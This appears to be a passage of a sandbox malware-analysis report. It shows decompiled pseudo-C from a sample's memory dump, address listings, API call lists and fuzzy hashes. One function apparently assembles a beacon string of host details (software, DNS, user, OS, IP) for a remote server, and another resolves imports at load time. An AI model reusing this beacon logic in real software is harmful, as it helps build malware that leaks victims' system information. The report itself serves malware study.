                                                                                                                                                                                                                                          				intOrPtr _t81;
                                                                                                                                                                                                                                          				int _t84;
                                                                                                                                                                                                                                          				intOrPtr _t86;
                                                                                                                                                                                                                                          				int _t89;
                                                                                                                                                                                                                                          				intOrPtr* _t92;
                                                                                                                                                                                                                                          				intOrPtr* _t93;
                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                          				intOrPtr _t101;
                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                          				int _t104;
                                                                                                                                                                                                                                          				void* _t105;
                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t98 = __edx;
                                                                                                                                                                                                                                          				_t94 = __ecx;
                                                                                                                                                                                                                                          				_t26 = __eax;
                                                                                                                                                                                                                                          				_t108 = _a16;
                                                                                                                                                                                                                                          				_v4 = 8;
                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                          					_t26 = GetTickCount();
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t27 =  *0x112d018; // 0xc9f186aa
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t28 =  *0x112d014; // 0x3a87c8cd
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t29 =  *0x112d010; // 0xd8d2f808
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t30 =  *0x112d00c; // 0x8f8f86c2
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t31 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t3 = _t31 + 0x112e633; // 0x74666f73
                                                                                                                                                                                                                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x112d02c,  *0x112d004, _t26);
                                                                                                                                                                                                                                          				_t34 = E011257AB();
                                                                                                                                                                                                                                          				_t35 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t4 = _t35 + 0x112e673; // 0x74707526
                                                                                                                                                                                                                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                                                                                                                                                                                                                          				_t111 = _t109 + 0x38;
                                                                                                                                                                                                                                          				_t105 = _t104 + _t38;
                                                                                                                                                                                                                                          				_t99 = E011273E9(_t94);
                                                                                                                                                                                                                                          				if(_t99 != 0) {
                                                                                                                                                                                                                                          					_t86 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t6 = _t86 + 0x112e8cb; // 0x736e6426
                                                                                                                                                                                                                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                                                                                                                                                                                                                          					_t111 = _t111 + 0xc;
                                                                                                                                                                                                                                          					_t105 = _t105 + _t89;
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _t99);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t100 = E0112614A();
                                                                                                                                                                                                                                          				if(_t100 != 0) {
                                                                                                                                                                                                                                          					_t81 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t8 = _t81 + 0x112e8d3; // 0x6f687726
                                                                                                                                                                                                                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                                                                                                                                                                                                                          					_t111 = _t111 + 0xc;
                                                                                                                                                                                                                                          					_t105 = _t105 + _t84;
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _t100);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t101 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				_a32 = E0112757B(0x112d00a, _t101 + 4);
                                                                                                                                                                                                                                          				_t43 =  *0x112d2cc; // 0x0
                                                                                                                                                                                                                                          				if(_t43 != 0) {
                                                                                                                                                                                                                                          					_t77 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t11 = _t77 + 0x112e8ad; // 0x3d736f26
                                                                                                                                                                                                                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                                                                                                                                                                                                                          					_t111 = _t111 + 0xc;
                                                                                                                                                                                                                                          					_t105 = _t105 + _t80;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t44 =  *0x112d2c8; // 0x0
                                                                                                                                                                                                                                          				if(_t44 != 0) {
                                                                                                                                                                                                                                          					_t74 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t13 = _t74 + 0x112e8a6; // 0x3d706926
                                                                                                                                                                                                                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_a32 != 0) {
                                                                                                                                                                                                                                          					_t103 = RtlAllocateHeap( *0x112d238, 0, 0x800);
                                                                                                                                                                                                                                          					if(_t103 != 0) {
                                                                                                                                                                                                                                          						E0112749F(GetTickCount());
                                                                                                                                                                                                                                          						_t51 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          						__imp__(_t51 + 0x40);
                                                                                                                                                                                                                                          						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                          						_t55 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          						__imp__(_t55 + 0x40);
                                                                                                                                                                                                                                          						_t57 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          						_t106 = E01124D2C(1, _t98, _t108,  *_t57);
                                                                                                                                                                                                                                          						asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                          						if(_t106 != 0) {
                                                                                                                                                                                                                                          							StrTrimA(_t106, 0x112c294);
                                                                                                                                                                                                                                          							_t63 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          							_push(_t106);
                                                                                                                                                                                                                                          							_t15 = _t63 + 0x112e252; // 0x616d692f
                                                                                                                                                                                                                                          							_t65 = E01129DEF(_t15);
                                                                                                                                                                                                                                          							_v20 = _t65;
                                                                                                                                                                                                                                          							if(_t65 != 0) {
                                                                                                                                                                                                                                          								_t92 = __imp__;
                                                                                                                                                                                                                                          								 *_t92(_t106, _v4);
                                                                                                                                                                                                                                          								 *_t92(_t103, _v0);
                                                                                                                                                                                                                                          								_t93 = __imp__;
                                                                                                                                                                                                                                          								 *_t93(_t103, _v32);
                                                                                                                                                                                                                                          								 *_t93(_t103, _t106);
                                                                                                                                                                                                                                          								_t71 = E0112666E(0xffffffffffffffff, _t103, _v32, _v28);
                                                                                                                                                                                                                                          								_v56 = _t71;
                                                                                                                                                                                                                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                                                                                                                                                                                                                          									E01126106();
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								HeapFree( *0x112d238, 0, _v48);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							HeapFree( *0x112d238, 0, _t106);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						HeapFree( *0x112d238, 0, _t103);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _a24);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				HeapFree( *0x112d238, 0, _t108);
                                                                                                                                                                                                                                          				return _a12;
                                                                                                                                                                                                                                          			}

















































                                                                                                                                                                                                                                          0x0112514f
                                                                                                                                                                                                                                          0x0112514f
                                                                                                                                                                                                                                          0x0112514f
                                                                                                                                                                                                                                          0x01125154
                                                                                                                                                                                                                                          0x0112515a
                                                                                                                                                                                                                                          0x01125164
                                                                                                                                                                                                                                          0x01125166
                                                                                                                                                                                                                                          0x01125166
                                                                                                                                                                                                                                          0x01125173
                                                                                                                                                                                                                                          0x0112517e
                                                                                                                                                                                                                                          0x01125181
                                                                                                                                                                                                                                          0x0112518c
                                                                                                                                                                                                                                          0x0112518f
                                                                                                                                                                                                                                          0x01125194
                                                                                                                                                                                                                                          0x01125197
                                                                                                                                                                                                                                          0x0112519c
                                                                                                                                                                                                                                          0x0112519f
                                                                                                                                                                                                                                          0x011251ab
                                                                                                                                                                                                                                          0x011251b8
                                                                                                                                                                                                                                          0x011251ba
                                                                                                                                                                                                                                          0x011251c0
                                                                                                                                                                                                                                          0x011251c5
                                                                                                                                                                                                                                          0x011251d0
                                                                                                                                                                                                                                          0x011251d2
                                                                                                                                                                                                                                          0x011251d5
                                                                                                                                                                                                                                          0x011251dc
                                                                                                                                                                                                                                          0x011251e0
                                                                                                                                                                                                                                          0x011251e2
                                                                                                                                                                                                                                          0x011251e7
                                                                                                                                                                                                                                          0x011251f3
                                                                                                                                                                                                                                          0x011251f5
                                                                                                                                                                                                                                          0x01125201
                                                                                                                                                                                                                                          0x01125203
                                                                                                                                                                                                                                          0x01125203
                                                                                                                                                                                                                                          0x0112520e
                                                                                                                                                                                                                                          0x01125212
                                                                                                                                                                                                                                          0x01125214
                                                                                                                                                                                                                                          0x01125219
                                                                                                                                                                                                                                          0x01125225
                                                                                                                                                                                                                                          0x01125227
                                                                                                                                                                                                                                          0x01125233
                                                                                                                                                                                                                                          0x01125235
                                                                                                                                                                                                                                          0x01125235
                                                                                                                                                                                                                                          0x0112523b
                                                                                                                                                                                                                                          0x0112524e
                                                                                                                                                                                                                                          0x01125252
                                                                                                                                                                                                                                          0x01125259
                                                                                                                                                                                                                                          0x0112525c
                                                                                                                                                                                                                                          0x01125261
                                                                                                                                                                                                                                          0x0112526c
                                                                                                                                                                                                                                          0x0112526e
                                                                                                                                                                                                                                          0x01125271
                                                                                                                                                                                                                                          0x01125271
                                                                                                                                                                                                                                          0x01125273
                                                                                                                                                                                                                                          0x0112527a
                                                                                                                                                                                                                                          0x0112527d
                                                                                                                                                                                                                                          0x01125282
                                                                                                                                                                                                                                          0x0112528c
                                                                                                                                                                                                                                          0x0112528e
                                                                                                                                                                                                                                          0x01125296
                                                                                                                                                                                                                                          0x011252af
                                                                                                                                                                                                                                          0x011252b3
                                                                                                                                                                                                                                          0x011252bf
                                                                                                                                                                                                                                          0x011252c4
                                                                                                                                                                                                                                          0x011252cd
                                                                                                                                                                                                                                          0x011252de
                                                                                                                                                                                                                                          0x011252e2
                                                                                                                                                                                                                                          0x011252eb
                                                                                                                                                                                                                                          0x011252f1
                                                                                                                                                                                                                                          0x011252fe
                                                                                                                                                                                                                                          0x0112530b
                                                                                                                                                                                                                                          0x01125311
                                                                                                                                                                                                                                          0x0112531d
                                                                                                                                                                                                                                          0x01125323
                                                                                                                                                                                                                                          0x01125328
                                                                                                                                                                                                                                          0x01125329
                                                                                                                                                                                                                                          0x01125330
                                                                                                                                                                                                                                          0x01125335
                                                                                                                                                                                                                                          0x0112533b
                                                                                                                                                                                                                                          0x01125341
                                                                                                                                                                                                                                          0x01125348
                                                                                                                                                                                                                                          0x0112534f
                                                                                                                                                                                                                                          0x01125355
                                                                                                                                                                                                                                          0x0112535c
                                                                                                                                                                                                                                          0x01125360
                                                                                                                                                                                                                                          0x0112536b
                                                                                                                                                                                                                                          0x01125370
                                                                                                                                                                                                                                          0x01125376
                                                                                                                                                                                                                                          0x0112537f
                                                                                                                                                                                                                                          0x0112537f
                                                                                                                                                                                                                                          0x01125390
                                                                                                                                                                                                                                          0x01125390
                                                                                                                                                                                                                                          0x0112539f
                                                                                                                                                                                                                                          0x0112539f
                                                                                                                                                                                                                                          0x011253ae
                                                                                                                                                                                                                                          0x011253ae
                                                                                                                                                                                                                                          0x011253c0
                                                                                                                                                                                                                                          0x011253c0
                                                                                                                                                                                                                                          0x011253cf
                                                                                                                                                                                                                                          0x011253e0

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 01125166
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 011251B3
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 011251D0
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 011251F3
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01125203
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 01125225
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01125235
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0112526C
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 0112528C
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 011252A9
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 011252B9
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(05649570), ref: 011252CD
                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(05649570), ref: 011252EB
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,011252FE,?,056495B0), ref: 01124D57
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: lstrlen.KERNEL32(?,?,?,011252FE,?,056495B0), ref: 01124D5F
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: strcpy.NTDLL ref: 01124D76
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: lstrcat.KERNEL32(00000000,?), ref: 01124D81
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,011252FE,?,056495B0), ref: 01124D9E
                                                                                                                                                                                                                                          • StrTrimA.SHLWAPI(00000000,0112C294,?,056495B0), ref: 0112531D
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrlen.KERNEL32(?,00000000,00000000,01125335,616D692F,00000000), ref: 01129DFB
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrlen.KERNEL32(?), ref: 01129E03
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrcpy.KERNEL32(00000000,?), ref: 01129E1A
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrcat.KERNEL32(00000000,?), ref: 01129E25
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 01125348
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0112534F
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 0112535C
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 01125360
                                                                                                                                                                                                                                            • Part of subcall function 0112666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 01126720
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 01125390
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 0112539F
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,056495B0), ref: 011253AE
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 011253C0
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 011253CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3080378247-0
                                                                                                                                                                                                                                          • Opcode ID: 4f3e768fd36ec6581e3aac538c58dda1e0f4663a3b3f64354d5a8e798e506640
                                                                                                                                                                                                                                          • Instruction ID: 74b5a5be3fdc231129fc53846d9d42b9d964279b46ffcc72997a1d017b416a40
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f3e768fd36ec6581e3aac538c58dda1e0f4663a3b3f64354d5a8e798e506640
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C561D171500211BFDB399FA8EC88F5A3BA9EF49354F150124FA18C7258DB38D8B5CB69
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                                          			E0112ADA5(long _a4, long _a8) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                          				LONG* _v28;
                                                                                                                                                                                                                                          				long _v40;
                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                          				CHAR* _v52;
                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                          				CHAR* _v60;
                                                                                                                                                                                                                                          				long _v64;
                                                                                                                                                                                                                                          				signed int* _v68;
                                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                                                          				intOrPtr* _t82;
                                                                                                                                                                                                                                          				intOrPtr* _t83;
                                                                                                                                                                                                                                          				intOrPtr* _t85;
                                                                                                                                                                                                                                          				intOrPtr* _t90;
                                                                                                                                                                                                                                          				intOrPtr* _t95;
                                                                                                                                                                                                                                          				intOrPtr* _t98;
                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                          				intOrPtr* _t104;
                                                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                                                          				long _t116;
                                                                                                                                                                                                                                          				void _t125;
                                                                                                                                                                                                                                          				void* _t131;
                                                                                                                                                                                                                                          				signed short _t133;
                                                                                                                                                                                                                                          				struct HINSTANCE__* _t138;
                                                                                                                                                                                                                                          				signed int* _t139;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t139 = _a4;
                                                                                                                                                                                                                                          				_v28 = _t139[2] + 0x1120000;
                                                                                                                                                                                                                                          				_t115 = _t139[3] + 0x1120000;
                                                                                                                                                                                                                                          				_t131 = _t139[4] + 0x1120000;
                                                                                                                                                                                                                                          				_v8 = _t139[7];
                                                                                                                                                                                                                                          				_v60 = _t139[1] + 0x1120000;
                                                                                                                                                                                                                                          				_v16 = _t139[5] + 0x1120000;
                                                                                                                                                                                                                                          				_v64 = _a8;
                                                                                                                                                                                                                                          				_v72 = 0x24;
                                                                                                                                                                                                                                          				_v68 = _t139;
                                                                                                                                                                                                                                          				_v56 = 0;
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				_v48 = 0;
                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                                                                          					_a8 =  &_v72;
                                                                                                                                                                                                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t138 =  *_v28;
                                                                                                                                                                                                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                                                                          				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                                                                          				_a4 = _t76;
                                                                                                                                                                                                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                                                                          				_v56 = _t80;
                                                                                                                                                                                                                                          				_t81 = _t133 + 0x1120002;
                                                                                                                                                                                                                                          				if(_t80 == 0) {
                                                                                                                                                                                                                                          					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_v52 = _t81;
                                                                                                                                                                                                                                          				_t82 =  *0x112d1a0; // 0x0
                                                                                                                                                                                                                                          				_t116 = 0;
                                                                                                                                                                                                                                          				if(_t82 == 0) {
                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                          					if(_t138 != 0) {
                                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                                          						_t83 =  *0x112d1a0; // 0x0
                                                                                                                                                                                                                                          						_v48 = _t138;
                                                                                                                                                                                                                                          						if(_t83 != 0) {
                                                                                                                                                                                                                                          							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_t116 != 0) {
                                                                                                                                                                                                                                          							L32:
                                                                                                                                                                                                                                          							 *_a8 = _t116;
                                                                                                                                                                                                                                          							L33:
                                                                                                                                                                                                                                          							_t85 =  *0x112d1a0; // 0x0
                                                                                                                                                                                                                                          							if(_t85 != 0) {
                                                                                                                                                                                                                                          								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                                          								_v48 = _t138;
                                                                                                                                                                                                                                          								_v44 = _t116;
                                                                                                                                                                                                                                          								 *_t85(5,  &_v72);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							return _t116;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                                                                          								if(_t116 == 0) {
                                                                                                                                                                                                                                          									_v40 = GetLastError();
                                                                                                                                                                                                                                          									_t90 =  *0x112d19c; // 0x0
                                                                                                                                                                                                                                          									if(_t90 != 0) {
                                                                                                                                                                                                                                          										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          									if(_t116 == 0) {
                                                                                                                                                                                                                                          										_a4 =  &_v72;
                                                                                                                                                                                                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                                                                          										_t116 = _v44;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                                                                          									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                                                                          									if(_t116 != 0) {
                                                                                                                                                                                                                                          										goto L32;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t98 =  *0x112d1a0; // 0x0
                                                                                                                                                                                                                                          					if(_t98 == 0) {
                                                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                                                          						_t138 = LoadLibraryA(_v60);
                                                                                                                                                                                                                                          						if(_t138 != 0) {
                                                                                                                                                                                                                                          							L13:
                                                                                                                                                                                                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                                                                          								FreeLibrary(_t138);
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								if(_t139[6] != 0) {
                                                                                                                                                                                                                                          									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                          									if(_t102 != 0) {
                                                                                                                                                                                                                                          										 *(_t102 + 4) = _t139;
                                                                                                                                                                                                                                          										_t125 =  *0x112d198; // 0x0
                                                                                                                                                                                                                                          										 *_t102 = _t125;
                                                                                                                                                                                                                                          										 *0x112d198 = _t102;
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_v40 = GetLastError();
                                                                                                                                                                                                                                          						_t104 =  *0x112d19c; // 0x0
                                                                                                                                                                                                                                          						if(_t104 == 0) {
                                                                                                                                                                                                                                          							L12:
                                                                                                                                                                                                                                          							_a8 =  &_v72;
                                                                                                                                                                                                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                                                                          							return _v44;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                                                                          						if(_t138 != 0) {
                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                                                                          					if(_t138 != 0) {
                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                                                                          				if(_t116 != 0) {
                                                                                                                                                                                                                                          					goto L33;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                          0x0112adb4
                                                                                                                                                                                                                                          0x0112adca
                                                                                                                                                                                                                                          0x0112add0
                                                                                                                                                                                                                                          0x0112add2
                                                                                                                                                                                                                                          0x0112add7
                                                                                                                                                                                                                                          0x0112addd
                                                                                                                                                                                                                                          0x0112ade2
                                                                                                                                                                                                                                          0x0112ade5
                                                                                                                                                                                                                                          0x0112adf3
                                                                                                                                                                                                                                          0x0112adfa
                                                                                                                                                                                                                                          0x0112adfd
                                                                                                                                                                                                                                          0x0112ae00
                                                                                                                                                                                                                                          0x0112ae01
                                                                                                                                                                                                                                          0x0112ae04
                                                                                                                                                                                                                                          0x0112ae07
                                                                                                                                                                                                                                          0x0112ae0a
                                                                                                                                                                                                                                          0x0112ae0f
                                                                                                                                                                                                                                          0x0112ae1e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112ae24
                                                                                                                                                                                                                                          0x0112ae2e
                                                                                                                                                                                                                                          0x0112ae38
                                                                                                                                                                                                                                          0x0112ae3d
                                                                                                                                                                                                                                          0x0112ae3f
                                                                                                                                                                                                                                          0x0112ae49
                                                                                                                                                                                                                                          0x0112ae4c
                                                                                                                                                                                                                                          0x0112ae4f
                                                                                                                                                                                                                                          0x0112ae55
                                                                                                                                                                                                                                          0x0112ae57
                                                                                                                                                                                                                                          0x0112ae57
                                                                                                                                                                                                                                          0x0112ae5a
                                                                                                                                                                                                                                          0x0112ae5d
                                                                                                                                                                                                                                          0x0112ae62
                                                                                                                                                                                                                                          0x0112ae66
                                                                                                                                                                                                                                          0x0112ae79
                                                                                                                                                                                                                                          0x0112ae7b
                                                                                                                                                                                                                                          0x0112af23
                                                                                                                                                                                                                                          0x0112af23
                                                                                                                                                                                                                                          0x0112af2a
                                                                                                                                                                                                                                          0x0112af2d
                                                                                                                                                                                                                                          0x0112af37
                                                                                                                                                                                                                                          0x0112af37
                                                                                                                                                                                                                                          0x0112af3b
                                                                                                                                                                                                                                          0x0112afb9
                                                                                                                                                                                                                                          0x0112afbc
                                                                                                                                                                                                                                          0x0112afbe
                                                                                                                                                                                                                                          0x0112afbe
                                                                                                                                                                                                                                          0x0112afc5
                                                                                                                                                                                                                                          0x0112afc7
                                                                                                                                                                                                                                          0x0112afd1
                                                                                                                                                                                                                                          0x0112afd4
                                                                                                                                                                                                                                          0x0112afd7
                                                                                                                                                                                                                                          0x0112afd7
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112af3d
                                                                                                                                                                                                                                          0x0112af40
                                                                                                                                                                                                                                          0x0112af6e
                                                                                                                                                                                                                                          0x0112af78
                                                                                                                                                                                                                                          0x0112af7c
                                                                                                                                                                                                                                          0x0112af84
                                                                                                                                                                                                                                          0x0112af87
                                                                                                                                                                                                                                          0x0112af8e
                                                                                                                                                                                                                                          0x0112af98
                                                                                                                                                                                                                                          0x0112af98
                                                                                                                                                                                                                                          0x0112af9c
                                                                                                                                                                                                                                          0x0112afa1
                                                                                                                                                                                                                                          0x0112afb0
                                                                                                                                                                                                                                          0x0112afb6
                                                                                                                                                                                                                                          0x0112afb6
                                                                                                                                                                                                                                          0x0112af9c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112af47
                                                                                                                                                                                                                                          0x0112af4a
                                                                                                                                                                                                                                          0x0112af52
                                                                                                                                                                                                                                          0x0112af67
                                                                                                                                                                                                                                          0x0112af6c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112af6c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112af52
                                                                                                                                                                                                                                          0x0112af40
                                                                                                                                                                                                                                          0x0112af3b
                                                                                                                                                                                                                                          0x0112ae81
                                                                                                                                                                                                                                          0x0112ae88
                                                                                                                                                                                                                                          0x0112ae98
                                                                                                                                                                                                                                          0x0112aea1
                                                                                                                                                                                                                                          0x0112aea5
                                                                                                                                                                                                                                          0x0112aee8
                                                                                                                                                                                                                                          0x0112aef4
                                                                                                                                                                                                                                          0x0112af1d
